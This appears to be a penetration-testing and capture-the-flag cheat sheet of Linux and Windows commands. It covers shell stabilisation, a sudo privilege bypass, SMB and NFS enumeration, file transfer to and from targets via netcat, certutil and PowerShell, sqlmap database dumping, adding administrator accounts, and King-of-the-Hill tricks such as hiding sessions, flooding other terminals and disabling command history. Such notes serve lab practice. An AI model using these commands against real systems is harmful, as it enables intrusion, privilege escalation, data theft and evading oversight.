4.4 KiB
Linux
Stablilize Shell
- ctrl+z
- stty raw -echo
- fg (press enter x2)
- export TERM=xterm , for using
clearcommand
Spawn bash
- /usr/bin/script -qc /bin/bash 1&>/dev/null
- python -c 'import pty;pty.spawn("/bin/bash")'
- python3 -c 'import pty;pty.spawn("/bin/bash")'
Vulnerable sudo version
sudo -u#-1 whoami
SMB Shares
SmbClient
smbclient -L \\\\<ip\\listing all sharessmbclient \\\\<ip>\\<share>accessing a share anonymouslysmbclient \\\\10.10.209.122\\<share> -U <share>accessing a share with an authorized user
Smbmap
smbmap -u <username> -p <password> -H <ip>
Smbget
smbget -R smb://<ip>/<share>
NFS shares
showmount -e <ip>This lists the nfs sharesmount -t nfs <ip>:/<share_name> <directory_where_to_mount>Mounting that share
Finding Binaries
- find . - perm /4000 (user id uid)
- find . -perm /2000 (group id guid)
Finding File capabilites
getcap -r / 2>/dev/null
Changing file attributes
chattr + i filename making file immutable
chattr -i filename making file mutable
lschattr filename Checking file attributes
Uploading Files
scp file/you/want user@ip:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -m http.server [port] By default will listen on 8000
Downloading Files
wget http://<ip>:port/<file>
Netcat to download files from target
nc -l -p [port] > file Receive file
nc -w 3 [ip] [port] < file Send file
Cracaking Zip Archive
fcrackzip -u -D -p <path_to_wordlist> <archive.zip>
killing a running job in same shell
jobs
Find it's job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
SSH Port Forwarding
ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>
SQL Map
sqlmap -r request.txt --dbms=mysql --dump
Windows
Adding User
net user "USER_NAME" "PASS" /add
Changing User's password
net user "USER_NAME" "NEWPASS"
Adding User to Administrators
net localgroup administrators "USER_NAME" /add
Changing File Permissions
CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R Read
2.W Write
3.C Change
4.F Full Control
Set File bits
attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit
Show hidden file/folder
dir /a show all hidden files & folder
dir /a:d show only hidden folder
dir /a:h show only hidden files
Downloading Files
certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe
powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe
Active Directory
powershell -ep bypass load a powershell shell with execution policy bypassed
. .\PowerView.ps1 import the PowerView module
Msfvenom
List All Payloads
msfvenom -l payloads
List Payload Format
msfvenom --list formats
Meterpreter
Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
King Of The Hill (KoTH)
Monitoring and Closing Shell (Linux)
- strace
debugging / tamper with processes - gbd
c/c++ debugger - script - records terminal activites
- w /who
check current pts ,terminal device - ps -t ps/pts-number
process monitoring - script /dev/pts/pts-number
montior terminal - cat /dev/urandom > /dev/pts/pts-number 2>/dev/null
prints arbitary text on terminal - pkill -9 -t pts/pts-number
Change SSH port
nano /etc/ssh/sshd_config (change PORT 22 to any port you want also you can tinker with configuration file)
Hide yourself from "w" or "who"
ssh user@ip -T This -T will have some limiations , that you cannot run bash and some other commands but is helpful.
Run Bash script on king.txt
while [ 1 ]; do /root/chattr -i king.txt; done &
Send messages to logged in users
- echo "msg" > /dev/pts/pts-number
send message to specific user - wall msg
boradcast message to everyone
Closing Session (Windows)
- quser
- logoff id|user_name
export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file